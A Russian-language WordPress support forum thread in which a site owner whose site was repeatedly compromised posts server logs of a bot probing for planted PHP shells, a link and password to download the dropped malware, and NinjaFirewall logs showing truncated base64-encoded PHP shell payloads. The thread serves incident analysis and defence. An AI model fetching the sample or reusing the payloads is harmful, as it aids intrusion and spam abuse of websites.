
  • Вот так стучится бот:

    198.71.59.117 - - [20/Aug/2015:00:16:00 +0300] "POST /wp-content/uploads/ms/view.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:01 +0300] "POST /wp-content/uploads/mgd/xmlrpcS0V.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:02 +0300] "POST /wp-content/uploads/ne/utf.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:02 +0300] "POST /wp-content/uploads/2012/07/guestbookVaV.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:03 +0300] "POST /wp-content/uploads/admlast.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:04 +0300] "POST /wp-content/uploads/vbv/title.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:05 +0300] "POST /wp-content/uploads/2014/02/object.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:06 +0300] "POST /wp-content/uploads/aj/header.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:07 +0300] "POST /wp-content/uploads/2014/02/backup.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:07 +0300] "POST /wp-content/uploads/2012/info.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:08 +0300] "POST /wp-content/uploads/ayv/template.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:09 +0300] "POST /wp-content/uploads/ne/admin.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:10 +0300] "POST /wp-content/uploads/2014/08/press.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:11 +0300] "POST /wp-content/uploads/2014/07/option.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:12 +0300] "POST /wp-content/uploads/ne/test.php HTTP/1.0" 404 3063 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:12 +0300] "POST /wp-content/uploads/qw/dir.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:13 +0300] "POST /wp-content/uploads/2014/03/test.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:14 +0300] "POST /wp-content/uploads/bj/article.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "GET /administrator/index.php HTTP/1.0" 200 4547 "-" "-"
    198.71.59.117 - - [20/Aug/2015:00:16:15 +0300] "POST /wp-content/uploads/hdy/info.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "POST /administrator/index.php HTTP/1.0" 303 26 "-" "-"
    178.137.90.21 - - [20/Aug/2015:00:16:15 +0300] "GET /administrator/index.php HTTP/1.0" 200 2065 "-" "-"
    198.71.59.117 - - [20/Aug/2015:00:16:16 +0300] "POST /wp-content/uploads/ccs/dirs.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:17 +0300] "POST /wp-content/themes/twentyten/sidebar.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:17 +0300] "POST /wp-content/plugins/xcalendar/xcalendar.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:18 +0300] "POST /wp-pass.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:19 +0300] "POST /wp-content/themes/twentythirteen/sidebar.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:20 +0300] "POST /wp-content/uploads/gqy/cache.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:21 +0300] "POST /wp-includes/theme-compat/header.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:22 +0300] "POST /wp-content/themes/twentythirteen/archive.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:23 +0300] "POST /wp-content/themes/twentyten/index.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:24 +0300] "POST /wp-includes/session.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:25 +0300] "POST /wp-content/themes/twentyeleven/sidebar-page.php HTTP/1.0" 500 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:26 +0300] "POST /wp-includes/class-wp-editor.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:26 +0300] "POST /wp-content/themes/twentyeleven/content-single.php HTTP/1.0" 500 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:27 +0300] "POST /wp-content/uploads/gqy/.1634dd.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:28 +0300] "POST /wp-content/uploads/vbv/info.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:29 +0300] "POST /wp-content/uploads/2014/02/templist.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:30 +0300] "POST /wp-content/uploads/wl/proxy.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:31 +0300] "POST /wp-includes/SimplePie/Author.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:31 +0300] "POST /wp-includes/SimplePie/Category.php HTTP/1.0" 200 26 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:32 +0300] "POST /wp-content/model.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:33 +0300] "POST /wp-includes/images/smilies/page.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:34 +0300] "POST /wp-content/uploads/page.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:35 +0300] "POST /wp-content/themes/twentyfifteen/article.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:35 +0300] "POST /wp-content/themes/twentyfourteen/images/global.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:36 +0300] "POST /wp-content/themes/twentythirteen/js/user.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:37 +0300] "POST /wp-includes/js/imgareaselect/proxy.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:38 +0300] "POST /wp-content/uploads/ms/sql.php HTTP/1.0" 404 3058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:39 +0300] "POST /wp-content/themes/twentyfifteen/css/dump.php HTTP/1.0" 404 3057 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:40 +0300] "POST /wp-includes/js/tinymce/plugins/paste/plugin.php HTTP/1.0" 404 3055 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:41 +0300] "POST /wp-includes/js/tinymce/plugins/wordpress/article.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:42 +0300] "POST /wp-includes/css/info.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:43 +0300] "POST /wp-includes/js/tinymce/plugins/compat3x/proxy.php HTTP/1.0" 404 3063 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:44 +0300] "POST /wp-includes/js/tinymce/plugins/lists/help.php HTTP/1.0" 404 3059 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:45 +0300] "POST /wp-content/uploads/2012/functions.php HTTP/1.0" 404 3056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:45 +0300] "POST /wp-content/themes/twentythirteen/js/user.php HTTP/1.0" 200 993 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:46 +0300] "POST /wp-content/themes/twentythirteen/tag.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:47 +0300] "POST /wp-content/themes/twentyfourteen/inc/featured-content.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:48 +0300] "POST /wp-content/themes/twentytwelve/content.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:49 +0300] "POST /wp-content/themes/twentyfifteen/archive.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:49 +0300] "POST /wp-content/themes/twentyfifteen/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:50 +0300] "POST /wp-content/themes/twentyfifteen/search.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:51 +0300] "POST /wp-content/themes/twentythirteen/content-status.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:52 +0300] "POST /wp-content/themes/twentyeleven/sidebar-page.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:52 +0300] "POST /wp-content/themes/twentythirteen/functions.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:53 +0300] "POST /wp-content/themes/twentythirteen/author.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:54 +0300] "POST /wp-content/themes/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:55 +0300] "POST /wp-content/themes/twentyfourteen/index.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:55 +0300] "POST /wp-content/themes/twentythirteen/content-image.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:56 +0300] "POST /wp-content/themes/twentyfifteen/author-bio.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:57 +0300] "POST /wp-content/themes/twentythirteen/footer.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:58 +0300] "POST /wp-content/themes/twentyfourteen/inc/customizer.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:58 +0300] "POST /wp-content/themes/twentytwelve/sidebar.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    198.71.59.117 - - [20/Aug/2015:00:16:59 +0300] "POST /wp-content/themes/twentyfourteen/content-gallery.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    В результате чего всё равно дропает кучу PHP в /wp-content. Там, где он натыкается на 404, — это я уже почистил за предыдущие 3-4 взлома 🙂 С помощью этой хрени рассылает кучу спама, и она используется в виде хостинга ссылок.

    Вот что дропает:
    https://www.virustotal.com/ru/file/bb15a692f22fa594a87d4da02f94daf334b5fb8ffc2c4c121d5005d363b0db8d/analysis/1440566877/

    Взять можно тут:
    https://cloud.mail.ru/public/7LDt/hiBphdJax
    Пароль 112233

  • Поставил для него ловушку POST запросов, еще раз сломает — запишу как он это делает. Задолбал.

    а толку то?
    если вас уже взломали 3-4 раза, то сейчас бот не найдет своего шелла и заново вас взломает и снова зальет шелл.

    лечить надо не симптомы, а саму болезнь.

    Ломает через стандартные скрипты WordPress входящие в поставку. WordPress и есть болезнь 🙂

    Когда в журнале выше стоит ошибка 500, в структуре сайта генерится файлик. А дальше уже через shell делает всякие гадости…

    Модератор Yui

    (@fierevere)

    永子

    можете показать запись с лога где 500 ошибка?

    и да, ваш .zip не распаковывается

    $ unzip hacking.wp.zip
    Archive:  hacking.wp.zip
       skipping: hacking.wp.tar          need PK compat. v5.1 (can do v4.6)

    Ломает через стандартные скрипты WordPress входящие в поставку. WordPress и есть болезнь 🙂

    я в этом глубоко сомневаюсь.
    значит миллионы сайтов живут спокойно, а новые дырки находят хакеры только на вашем сайте. так что ли?

    если у вас последняя версия движка и плагинов, то хрен вас кто взломает (если, конечно, исключить взлом устаревшего серверного ПО).

    Модератор Yui

    (@fierevere)

    永子

    Flector, ко мне заходили эти гости, пробуют огромный набор эксплоитов, лог оставляют примерно на мегабайт, тыкаются везде где могут, ищут как скрипты, так и дыры непосредственно в PHP

    Вот у ТСа нашли чего-то и воспользовались

    тыкаются везде где могут, ищут как скрипты, так и дыры непосредственно в PHP

    да я и по логу уже понял, что там идет банальный перебор известных эксплойтов. и с последней версией wordpress они могут найти какую угодно дырку, но только не в движке. потому что это даже не разумный взлом — а тупейший авто-взлом без участия самого хакера.

    >можете показать запись с лога где 500 ошибка?

    В первом сообщении число сразу после HTTP/1.0 — это код ответа: 200, 404, 500.

    >и да, ваш .zip не распаковывается
    >need PK compat

    Вы забыли указать пароль через ключ -P, например, так:
    unzip -P 112233 hacking.wp.zip

    >я в этом глубоко сомневаюсь.

    Поверьте, ошибок в настройке хостинга нет, версия движка последняя, с правами всё очень жёстко. Благодаря этому очень быстро находятся файлики, созданные www:www, и удаляются. Выше папки /wp-content они подняться не смогли, хотя очень пытались.

    По совету англоязычного форума поставил NinjaFirewall и прописал туда в начало перехват всех POST-запросов. Еще раз «стукнет», напишу что и как.

    еще раз — если «ошибок» нет, то вас взломать не могли.
    вас же даже не разумный хакер взламывает — запустили скрипт перебора известных эксплойтов и ломают. а раз взламывает через известные эксплойты — значит есть у вас дырявый софт на сайте. и уж точно не wordpress, если он последний.

    Модератор Yui

    (@fierevere)

    永子

    $ unzip -P 112233 hacking.wp.zip
    Archive:  hacking.wp.zip
       skipping: hacking.wp.tar          need PK compat. v5.1 (can do v4.6)
    
    $ unzip -V
    UnZip 6.00 of 20 April 2009, by ALT Linux Team.  Original by Info-ZIP.

    198.71.59.117 - - [20/Aug/2015:00:16:21 +0300] "POST /wp-includes/theme-compat/header.php HTTP/1.0" 500 26
    это? ну навряд ли это непосредственно WP, скорее эксплуатация уязвимости PHP через него.

    итак, хотелось бы видеть phpinfo()

    Постучал :-))

    Вот логи NinjaFirewall:

    DATE         INCIDENT  LEVEL     RULE     IP            REQUEST
    26/Aug/15 20:11:39  #1762326  medium     531  69.30.231.66     GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
    26/Aug/15 21:09:56  #4058437  critical   360  64.31.29.188     POST /index.php - Shell/backdoor (a) - [POST:a = Php]
    27/Aug/15 01:09:40  #6157366  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 06:55:02  #4794522  medium     531  37.157.193.84    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
    27/Aug/15 07:07:11  #8613809  medium     531  193.164.216.238  GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
    27/Aug/15 11:07:14  #3817059  info         -  192.168.1.10     POST /wp-login.php - Logged in user - [admin (administrator)]
    27/Aug/15 13:00:13  #5227463  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 13:25:57  #4715688  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 14:36:34  #6332628  medium     531  108.59.8.70      GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]
    27/Aug/15 15:57:42  #1290706  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 16:11:20  #6182357  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 16:18:36  #4040097  medium     531  188.165.15.60    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)]
    27/Aug/15 16:30:59  #2767278  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/tag.php - base64-encoded injection - [POST:nf8ce7b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:01  #7538106  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/functions.php - base64-encoded injection - [POST:n78cd5a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:02  #5904709  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/sidebar.php - base64-encoded injection - [POST:n7feb09 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:03  #6453220  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n55d3bf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:04  #4232088  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:neb6d80 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:06  #6155168  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/inc/featured-content.php - base64-encoded injection - [POST:n491b4c = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:07  #1509132  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/author.php - base64-encoded injection - [POST:n725a1e = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:08  #3070642  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/content-gallery.php - base64-encoded injection - [POST:n272748 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:09  #8282241  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n3c60b2 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:11  #8446923  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nf76775 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:12  #5784380  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/content.php - base64-encoded injection - [POST:nf0adb6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
